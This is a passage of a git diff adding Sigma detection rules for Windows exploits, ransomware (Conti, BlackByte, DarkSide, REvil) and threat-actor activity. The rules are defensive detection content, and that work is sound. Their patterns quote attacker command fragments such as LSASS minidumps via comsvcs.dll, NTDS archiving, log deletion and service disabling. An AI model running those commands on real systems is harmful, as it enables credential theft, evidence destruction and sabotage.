Legit Printer + condition: process_creation and selection +falsepositives: + - Unknown +level: critical +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/registry_set_cve_2021_31979_cve_2021_33771_exploits.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/registry_set_cve_2021_31979_cve_2021_33771_exploits.yml new file mode 100644 index 000000000..2fbf20afa --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/registry_set_cve_2021_31979_cve_2021_33771_exploits.yml @@ -0,0 +1,38 @@ +title: CVE-2021-31979 CVE-2021-33771 Exploits +id: 32b5db62-cb5f-4266-9639-0fa48376ac00 +status: experimental +description: Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum +references: + - https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/ + - https://citizenlab.ca/2021/07/hooking-candiru-another-mercenary-spyware-vendor-comes-into-focus/ +author: Sittikorn S, frack113 +date: 2021/07/16 +modified: 2023/08/17 +tags: + - attack.credential_access + - attack.t1566 + - attack.t1203 + - cve.2021.33771 + - cve.2021.31979 + - detection.emerging_threats + # - threat_group.Sourgum +logsource: + product: windows + category: registry_set +detection: + registry_set: + EventID: 4657 + Channel: Security + selection: + ObjectName|endswith: + - CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32\(Default) + - CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InProcServer32\(Default) + filter: + NewValue|endswith: + - system32\wbem\wmiutils.dll + - system32\wbem\wbemsvc.dll + condition: registry_set and (selection and not filter) +falsepositives: + - Unlikely +level: critical +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/win_exchange_cve_2021_42321.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/win_exchange_cve_2021_42321.yml new file mode 100644 index 000000000..b852c739f --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/win_exchange_cve_2021_42321.yml @@ -0,0 +1,32 @@ +title: Possible Exploitation of Exchange RCE CVE-2021-42321 +id: c92f1896-d1d2-43c3-92d5-7a5b35c217bb +status: test +description: Detects log entries that appear in exploitation attempts against MS Exchange RCE CVE-2021-42321 +references: + - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-42321 +author: Florian Roth (Nextron Systems), @testanull +date: 2021/11/18 +modified: 2022/07/12 +tags: + - attack.lateral_movement + - attack.t1210 + - detection.emerging_threats +logsource: + product: windows + service: msexchange-management + # warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly +detection: + msexchange_management: + Channel: MSExchange Management + selection: + EventID: + - 6 + - 8 + Data|contains: + - 'Cmdlet failed. Cmdlet Get-App, ' + - 'Task Get-App throwing unhandled exception: System.InvalidCastException:' + condition: msexchange_management and selection +falsepositives: + - Unknown, please report false positives via https://github.com/SigmaHQ/sigma/issues +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Malware/BlackByte/proc_creation_win_malware_blackbyte_ransomware.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Malware/BlackByte/proc_creation_win_malware_blackbyte_ransomware.yml new file mode 100644 index 000000000..8e07648bc --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Malware/BlackByte/proc_creation_win_malware_blackbyte_ransomware.yml @@ -0,0 +1,39 @@ +title: Potential BlackByte Ransomware Activity +id: 999e8307-a775-4d5f-addc-4855632335be +status: test +description: Detects command line patterns used by BlackByte ransomware in different operations +references: + - https://redcanary.com/blog/blackbyte-ransomware/ +author: Florian Roth (Nextron Systems) +date: 2022/02/25 +modified: 2023/02/08 +tags: + - detection.emerging_threats + - attack.execution + - attack.defense_evasion + - attack.impact + - attack.t1485 + - attack.t1498 + - attack.t1059.001 + - attack.t1140 +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection_1: + CommandLine|contains: ' -single ' + NewProcessName|startswith: C:\Users\Public\ + selection_2: + CommandLine|contains: + - del C:\Windows\System32\Taskmgr.exe + - ;Set-Service -StartupType Disabled $ + - powershell -command "$x =[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( + - ' do start wordpad.exe /p ' + condition: process_creation and (1 of selection_*) +falsepositives: + - Unknown +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti.yml new file mode 100644 index 000000000..a1cee1e23 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti.yml @@ -0,0 +1,33 @@ +title: Conti Volume Shadow Listing +id: 7b30e0a7-c675-4b24-8a46-82fa67e2433d +status: test +description: Detects a command used by conti to find volume shadow backups +references: + - https://twitter.com/vxunderground/status/1423336151860002816?s=20 + - https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection +author: Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems) +date: 2021/08/09 +tags: + - attack.t1587.001 + - attack.resource_development + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + CommandLine|contains|all: + - vssadmin list shadows + - log.txt + condition: process_creation and selection +fields: + - SubjectUserName + - ParentProcessName + - CommandLine +falsepositives: + - Unknown +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti_7zip.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti_7zip.yml new file mode 100644 index 000000000..96ab7caba --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti_7zip.yml @@ -0,0 +1,30 @@ +title: Conti NTDS Exfiltration Command +id: aa92fd02-09f2-48b0-8a93-864813fb8f41 +status: test +description: Detects a command used by conti to exfiltrate NTDS +references: + - https://twitter.com/vxunderground/status/1423336151860002816?s=20 + - https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection +author: Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems) +date: 2021/08/09 +modified: 2022/10/09 +tags: + - attack.collection + - attack.t1560 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + CommandLine|contains|all: + - 7za.exe + - \\C$\\temp\\log.zip + condition: process_creation and selection +falsepositives: + - Unknown +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti_ransomware_commands.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti_ransomware_commands.yml new file mode 100644 index 000000000..dbb15619a --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti_ransomware_commands.yml @@ -0,0 +1,35 @@ +title: Potential Conti Ransomware Activity +id: 689308fc-cfba-4f72-9897-796c1dc61487 +status: test +description: Detects a specific command used by the Conti ransomware group +references: + - https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/ + - https://twitter.com/VK_Intel/status/1447795359900704769?t=Xz7vaLTvaaCZ5kHoZa6gMw&s=19 +author: frack113 +date: 2021/10/12 +modified: 2023/02/13 +tags: + - attack.impact + - attack.s0575 + - attack.t1486 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + CommandLine|contains|all: + - '-m ' + - '-net ' + - '-size ' # Size 10 in references + - '-nomutex ' + - -p \\\\ + - $ + condition: process_creation and selection +falsepositives: + - Unlikely +level: critical +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti_ransomware_database_dump.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti_ransomware_database_dump.yml new file mode 100644 index 000000000..3f3b4fccc --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti_ransomware_database_dump.yml @@ -0,0 +1,39 @@ +title: Potential Conti Ransomware Database Dumping Activity Via SQLCmd +id: 2f47f1fd-0901-466e-a770-3b7092834a1b +status: test +description: Detects a command used by conti to dump database +references: + - https://twitter.com/vxunderground/status/1423336151860002816?s=20 # The leak info not the files itself + - https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection + - https://docs.microsoft.com/en-us/sql/tools/sqlcmd-utility?view=sql-server-ver15 +author: frack113 +date: 2021/08/16 +modified: 2023/05/04 +tags: + - attack.collection + - attack.t1005 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection_tools: + - NewProcessName|endswith: \sqlcmd.exe + - CommandLine|contains: + - 'sqlcmd ' + - sqlcmd.exe + selection_svr: + CommandLine|contains: ' -S localhost ' + selection_query: + CommandLine|contains: + - sys.sysprocesses + - master.dbo.sysdatabases + - BACKUP DATABASE + condition: process_creation and (all of selection_*) +falsepositives: + - Unknown +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Malware/DarkSide/proc_creation_win_malware_darkside_ransomware.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Malware/DarkSide/proc_creation_win_malware_darkside_ransomware.yml new file mode 100644 index 000000000..ca667dbe3 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Malware/DarkSide/proc_creation_win_malware_darkside_ransomware.yml @@ -0,0 +1,34 @@ +title: DarkSide Ransomware Pattern +id: 965fff6c-1d7e-4e25-91fd-cdccd75f7d2c +status: test +description: Detects DarkSide Ransomware and helpers +references: + - https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html + - https://app.any.run/tasks/8b9a571b-bcc1-4783-ba32-df4ba623b9c0/ + - https://www.joesandbox.com/analysis/411752/0/html#7048BB9A06B8F2DD9D24C77F389D7B2B58D2 +author: Florian Roth (Nextron Systems) +date: 2021/05/14 +tags: + - attack.execution + - attack.t1204 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection1: + CommandLine|contains: + - =[char][byte]('0x'+ + - ' -work worker0 -path ' + selection2: + ParentCommandLine|contains: DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7} + NewProcessName|contains: \AppData\Local\Temp\ + condition: process_creation and (1 of selection*) +falsepositives: + - Unknown + - UAC bypass method used by other malware +level: critical +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Malware/Devil-Bait/proc_creation_win_malware_devil_bait_output_redirect.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Malware/Devil-Bait/proc_creation_win_malware_devil_bait_output_redirect.yml new file mode 100644 index 000000000..0b71d9f68 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Malware/Devil-Bait/proc_creation_win_malware_devil_bait_output_redirect.yml @@ -0,0 +1,43 @@ +title: Potential Devil Bait Malware Reconnaissance +id: e8954be4-b2b8-4961-be18-da1a5bda709c +related: + - id: 8e0bb260-d4b2-4fff-bb8d-3f82118e6892 + type: derived +status: experimental +description: Detects specific process behavior observed with Devil Bait samples +references: + - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/devil-bait/NCSC-MAR-Devil-Bait.pdf + - https://www.virustotal.com/gui/file/fa71eee906a7849ba3f4bab74edb577bd1f1f8397ca428591b4a9872ce1f1e9b/behavior +author: Nasreddine Bencherchali (Nextron Systems), NCSC (Idea) +date: 2023/05/15 +tags: + - attack.execution + - attack.t1218 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection_redirect: + CommandLine|contains: '>>%APPDATA%\Microsoft\' + CommandLine|endswith: + - .xml + - .txt + ParentProcessName|endswith: \wscript.exe + NewProcessName|endswith: \cmd.exe + selection_recon_cmd: + CommandLine|contains: + # Taken from a6f9043627f8be2452153b5dbf6278e9b91763c3b5c2aea537a859e0c8c6b504 + # If you find samples using other commands please add them + - dir + - ipconfig /all + - systeminfo + - tasklist + condition: process_creation and (all of selection_*) +falsepositives: + - Unlikely +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Malware/Goofy-Guineapig/proc_creation_win_malware_goofy_guineapig_broken_cmd.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Malware/Goofy-Guineapig/proc_creation_win_malware_goofy_guineapig_broken_cmd.yml new file mode 100644 index 000000000..b6dea421d --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Malware/Goofy-Guineapig/proc_creation_win_malware_goofy_guineapig_broken_cmd.yml @@ -0,0 +1,25 @@ +title: Potential Goofy Guineapig Backdoor Activity +id: 477a5ed3-a374-4282-9f3b-ed94e159a108 +status: experimental +description: Detects a specific broken command that was used by Goofy-Guineapig as described by the NCSC report. +references: + - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/goofy-guineapig/NCSC-MAR-Goofy-Guineapig.pdf +author: X__Junior (Nextron Systems) +date: 2023/05/14 +tags: + - attack.execution + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + CommandLine|contains: choice /t %d /d y /n >nul + condition: process_creation and selection +falsepositives: + - Unlikely +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Malware/Goofy-Guineapig/proc_creation_win_malware_goofy_guineapig_googleupdate_uncommon_child_instance.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Malware/Goofy-Guineapig/proc_creation_win_malware_goofy_guineapig_googleupdate_uncommon_child_instance.yml new file mode 100644 index 000000000..df83e5aee --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Malware/Goofy-Guineapig/proc_creation_win_malware_goofy_guineapig_googleupdate_uncommon_child_instance.yml @@ -0,0 +1,31 @@ +title: Potential Goofy Guineapig GoolgeUpdate Process Anomaly +id: bdbab15a-3826-48fa-a1b7-723cd8f32fcc +status: experimental +description: Detects "GoogleUpdate.exe" spawning a new instance of itself in an uncommon location as seen used by the Goofy Guineapig backdoor +references: + - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/goofy-guineapig/NCSC-MAR-Goofy-Guineapig.pdf +author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +date: 2023/05/15 +tags: + - attack.defense_evasion + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + ParentProcessName|endswith: \GoogleUpdate.exe + NewProcessName|endswith: \GoogleUpdate.exe + filter_main_legit_paths: + - NewProcessName|startswith: + - C:\Program Files\Google\ + - C:\Program Files (x86)\Google\ + - NewProcessName|contains: \AppData\Local\Google\Update\ + condition: process_creation and (selection and not 1 of filter_main_*) +falsepositives: + - Unknown +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Malware/Goofy-Guineapig/win_system_malware_goofy_guineapig_service_persistence.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Malware/Goofy-Guineapig/win_system_malware_goofy_guineapig_service_persistence.yml new file mode 100644 index 000000000..f5b1c2c52 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Malware/Goofy-Guineapig/win_system_malware_goofy_guineapig_service_persistence.yml @@ -0,0 +1,30 @@ +title: Goofy Guineapig Backdoor Service Creation +id: 8c15dd74-9570-4f48-80b2-29996fd91ee6 +status: experimental +description: Detects service creation persistence used by the Goofy Guineapig backdoor +references: + - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/goofy-guineapig/NCSC-MAR-Goofy-Guineapig.pdf +author: Nasreddine Bencherchali (Nextron Systems) +date: 2023/05/15 +tags: + - attack.persistence + - detection.emerging_threats +logsource: + product: windows + service: system +detection: + system: + Channel: System + selection: + Provider_Name: Service Control Manager + EventID: 7045 + ServiceName: GoogleUpdate + ImagePath|contains|all: + - rundll32 + - FileProtocolHandler + - \ProgramData\GoogleUpdate\GoogleUpdate.exe + condition: system and selection +falsepositives: + - Unlikely +level: critical +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Malware/Pingback/proc_creation_win_malware_pingback_backdoor.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Malware/Pingback/proc_creation_win_malware_pingback_backdoor.yml new file mode 100644 index 000000000..7d204765c --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Malware/Pingback/proc_creation_win_malware_pingback_backdoor.yml @@ -0,0 +1,38 @@ +title: Pingback Backdoor Activity +id: b2400ffb-7680-47c0-b08a-098a7de7e7a9 +related: + - id: 35a7dc42-bc6f-46e0-9f83-81f8e56c8d4b # DLL Load + type: similar + - id: 2bd63d53-84d4-4210-80ff-bf0658f1bf78 # File Indicators + type: similar +status: test +description: Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report +references: + - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/backdoor-at-the-end-of-the-icmp-tunnel + - https://app.any.run/tasks/4a54c651-b70b-4b72-84d7-f34d301d6406 +author: Bhabesh Raj +date: 2021/05/05 +modified: 2023/02/17 +tags: + - attack.persistence + - attack.t1574.001 + - detection.emerging_threats +logsource: + product: windows + category: process_creation +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + CommandLine|contains|all: + - config + - msdtc + - start + - auto + ParentProcessName|endswith: \updata.exe + condition: process_creation and selection +falsepositives: + - Unlikely +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Malware/Small-Sieve/proc_creation_win_malware_small_sieve_cli_arg.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Malware/Small-Sieve/proc_creation_win_malware_small_sieve_cli_arg.yml new file mode 100644 index 000000000..bbd432ddf --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Malware/Small-Sieve/proc_creation_win_malware_small_sieve_cli_arg.yml @@ -0,0 +1,26 @@ +title: Small Sieve Malware CommandLine Indicator +id: 21117127-21c8-437a-ae03-4b51e5a8a088 +status: test +description: Detects specific command line argument being passed to a binary as seen being used by the malware Small Sieve. +references: + - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/small-sieve/NCSC-MAR-Small-Sieve.pdf +author: Nasreddine Bencherchali (Nextron Systems) +date: 2023/05/19 +tags: + - attack.persistence + - attack.t1574.001 + - detection.emerging_threats +logsource: + product: windows + category: process_creation +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + CommandLine|endswith: .exe Platypus + condition: process_creation and selection +falsepositives: + - Unlikely +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Malware/Small-Sieve/registry_set_malware_small_sieve_evasion_typo.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Malware/Small-Sieve/registry_set_malware_small_sieve_evasion_typo.yml new file mode 100644 index 000000000..8435c429c --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Malware/Small-Sieve/registry_set_malware_small_sieve_evasion_typo.yml @@ -0,0 +1,29 @@ +title: Small Sieve Malware Registry Persistence +id: 65c6e3c1-fb28-4c03-a51e-84919d8185f1 +status: experimental +description: Detects registry value with specific intentional typo and strings seen used by the Small Sieve malware +references: + - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/small-sieve/NCSC-MAR-Small-Sieve.pdf +author: Nasreddine Bencherchali (Nextron Systems) +date: 2023/05/19 +modified: 2023/08/17 +tags: + - attack.persistence + - detection.emerging_threats +logsource: + category: registry_set + product: windows +detection: + registry_set: + EventID: 4657 + Channel: Security + selection_path: + ObjectName|contains: \Microsoft\Windows\CurrentVersion\Run\ + selection_value: + - ObjectName|contains: Microsift + - NewValue|contains: .exe Platypus + condition: registry_set and (all of selection_*) +falsepositives: + - Unlikely +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2021/TA/HAFNIUM/proc_creation_win_apt_hafnium.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/TA/HAFNIUM/proc_creation_win_apt_hafnium.yml new file mode 100644 index 000000000..f01a1996e --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/TA/HAFNIUM/proc_creation_win_apt_hafnium.yml @@ -0,0 +1,81 @@ +title: HAFNIUM Exchange Exploitation Activity +id: bbb2dedd-a0e3-46ab-ba6c-6c82ae7a9aa7 +status: test +description: Detects activity observed by different researchers to be HAFNIUM group activity (or related) on Exchange servers +references: + - https://blog.truesec.com/2021/03/07/exchange-zero-day-proxylogon-and-hafnium/ + - https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/ + - https://discuss.elastic.co/t/detection-and-response-for-hafnium-activity/266289/3 + - https://twitter.com/GadixCRK/status/1369313704869834753?s=20 + - https://twitter.com/BleepinComputer/status/1372218235949617161 +author: Florian Roth (Nextron Systems) +date: 2021/03/09 +modified: 2023/03/09 +tags: + - attack.persistence + - attack.t1546 + - attack.t1053 + - attack.g0125 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection_attrib: + CommandLine|contains|all: + - attrib + - ' +h ' + - ' +s ' + - ' +r ' + - .aspx + selection_vsperfmon: + - NewProcessName|contains: \ProgramData\VSPerfMon\ + - CommandLine|contains|all: + - schtasks + - VSPerfMon + selection_opera_1: + NewProcessName|endswith: Opera_browser.exe + ParentProcessName|endswith: + - \services.exe + - \svchost.exe + selection_opera_2: + NewProcessName|endswith: Users\Public\opera\Opera_browser.exe + selection_vssadmin: + CommandLine|contains|all: + - vssadmin list shadows + - Temp\__output + selection_makecab_1: + CommandLine|contains|all: + - inetpub\wwwroot\ + - .dmp.zip + NewProcessName|endswith: \makecab.exe + selection_makecab_2: + CommandLine|contains: + - Microsoft\Exchange Server\ + - compressionmemory + - .gif + NewProcessName|endswith: \makecab.exe + selection_7zip: + CommandLine|contains|all: + - ' -t7z ' + - C:\Programdata\pst + - \it.zip + selection_rundll32: + CommandLine|contains|all: + - \comsvcs.dll + - Minidump + - 'full ' + - \inetpub\wwwroot + selection_other: + CommandLine|contains: + - Windows\Temp\xx.bat + - Windows\WwanSvcdcs + - Windows\Temp\cw.exe + condition: process_creation and (1 of selection*) +falsepositives: + - Unlikely +level: critical +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2021/TA/Kaseya-Supply-Chain/proc_creation_win_apt_revil_kaseya.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/TA/Kaseya-Supply-Chain/proc_creation_win_apt_revil_kaseya.yml new file mode 100644 index 000000000..7ff674180 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/TA/Kaseya-Supply-Chain/proc_creation_win_apt_revil_kaseya.yml @@ -0,0 +1,50 @@ +title: REvil Kaseya Incident Malware Patterns +id: 5de632bc-7fbd-4c8a-944a-fce55c59eae5 +status: test +description: Detects process command line patterns and locations used by REvil group in Kaseya incident (can also match on other malware) +references: + - https://community.sophos.com/b/security-blog/posts/active-ransomware-attack-on-kaseya-customers + - https://www.joesandbox.com/analysis/443736/0/html + - https://doublepulsar.com/kaseya-supply-chain-attack-delivers-mass-ransomware-event-to-us-companies-76e4ec6ec64b + - https://therecord.media/revil-ransomware-executes-supply-chain-attack-via-malicious-kaseya-update/ + - https://blog.truesec.com/2021/07/04/kaseya-supply-chain-attack-targeting-msps-to-deliver-revil-ransomware/ +author: Florian Roth (Nextron Systems) +date: 2021/07/03 +modified: 2022/05/20 +tags: + - attack.execution + - attack.t1059 + - attack.g0115 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection1: + CommandLine|contains: + - C:\Windows\cert.exe + - del /q /f c:\kworking\agent.crt + - Kaseya VSA Agent Hot-fix + - \AppData\Local\Temp\MsMpEng.exe + - rmdir /s /q %SystemDrive%\inetpub\logs + - del /s /q /f %SystemDrive%\\*.log + - c:\kworking1\agent.exe + - c:\kworking1\agent.crt + selection2: + NewProcessName: + - C:\Windows\MsMpEng.exe + - C:\Windows\cert.exe + - C:\kworking\agent.exe + - C:\kworking1\agent.exe + selection3: + CommandLine|contains|all: + - del /s /q /f + - WebPages\Errors\webErrorLog.txt + condition: process_creation and (1 of selection*) +falsepositives: + - Unknown +level: critical +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2021/TA/SOURGUM/proc_creation_win_apt_sourgrum.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/TA/SOURGUM/proc_creation_win_apt_sourgrum.yml new file mode 100644 index 000000000..13615cfa6 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/TA/SOURGUM/proc_creation_win_apt_sourgrum.yml @@ -0,0 +1,44 @@ +title: SOURGUM Actor Behaviours +id: 7ba08e95-1e0b-40cd-9db5-b980555e42fd +status: test +description: Suspicious behaviours related to an actor tracked by Microsoft as SOURGUM +references: + - https://www.virustotal.com/gui/file/c299063e3eae8ddc15839767e83b9808fd43418dc5a1af7e4f44b97ba53fbd3d/detection + - https://github.com/Azure/Azure-Sentinel/blob/43e9be273dca321295190bfc4902858e009d4a35/Detections/MultipleDataSources/SOURGUM_IOC.yaml + - https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/ +author: MSTIC, FPT.EagleEye +date: 2021/06/15 +modified: 2022/10/09 +tags: + - attack.t1546 + - attack.t1546.015 + - attack.persistence + - attack.privilege_escalation + - detection.emerging_threats +logsource: + product: windows + category: process_creation +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + NewProcessName|contains: + - windows\system32\Physmem.sys + - Windows\system32\ime\SHARED\WimBootConfigurations.ini + - Windows\system32\ime\IMEJP\WimBootConfigurations.ini + - Windows\system32\ime\IMETC\WimBootConfigurations.ini + registry_image: + CommandLine|contains: reg add + NewProcessName|contains: + - windows\system32\filepath2 + - windows\system32\ime + registry_key: + CommandLine|contains: + - HKEY_LOCAL_MACHINE\software\classes\clsid\{7c857801-7381-11cf-884d-00aa004b2e24}\inprocserver32 + - HKEY_LOCAL_MACHINE\software\classes\clsid\{cf4cc405-e2c5-4ddd-b3ce-5e7582d8c9fa}\inprocserver32 + condition: process_creation and (selection or all of registry_*) +falsepositives: + - Unknown +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2022/Exploits/CVE-2022-21554/proc_creation_win_exploit_cve_2023_21554_queuejumper.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2022/Exploits/CVE-2022-21554/proc_creation_win_exploit_cve_2023_21554_queuejumper.yml new file mode 100644 index 000000000..5521500b4 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2022/Exploits/CVE-2022-21554/proc_creation_win_exploit_cve_2023_21554_queuejumper.yml @@ -0,0 +1,39 @@ +title: Potential CVE-2023-21554 QueueJumper Exploitation +id: 53207cc2-0745-4c19-bc72-80be1cc16b3f +status: experimental +description: Detects potential exploitation of CVE-2023-21554 (dubbed QueueJumper) +references: + - https://research.checkpoint.com/2023/queuejumper-critical-unauthorized-rce-vulnerability-in-msmq-service/ +author: Nasreddine Bencherchali (Nextron Systems) +date: 2023/04/12 +tags: + - attack.privilege_escalation + - attack.execution + - cve.2023.21554 + - detection.emerging_threats +logsource: + product: windows + category: process_creation +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + ParentProcessName|endswith: \Windows\System32\mqsvc.exe + NewProcessName|endswith: + - \cmd.exe + - \cscript.exe + - \mshta.exe + - \powershell.exe + - \pwsh.exe + - \regsvr32.exe + - \rundll32.exe + - \schtasks.exe + - \wmic.exe + - \wscript.exe + - \wsl.exe + condition: process_creation and selection +falsepositives: + - Unknown +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2022/Exploits/CVE-2022-29072/proc_creation_win_exploit_cve_2022_29072_7zip.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2022/Exploits/CVE-2022-29072/proc_creation_win_exploit_cve_2022_29072_7zip.yml new file mode 100644 index 000000000..0b9627f8c --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2022/Exploits/CVE-2022-29072/proc_creation_win_exploit_cve_2022_29072_7zip.yml @@ -0,0 +1,41 @@ +title: Potential CVE-2022-29072 Exploitation Attempt +id: 9a4ccd1a-3526-4d99-b980-9f9c5d3a6ee3 +status: test +description: | + Detects potential exploitation attempts of CVE-2022-29072, a 7-Zip privilege escalation and command execution vulnerability. + 7-Zip version 21.07 and earlier on Windows allows privilege escalation (CVE-2022-29072) and command execution when a file with the .7z extension is 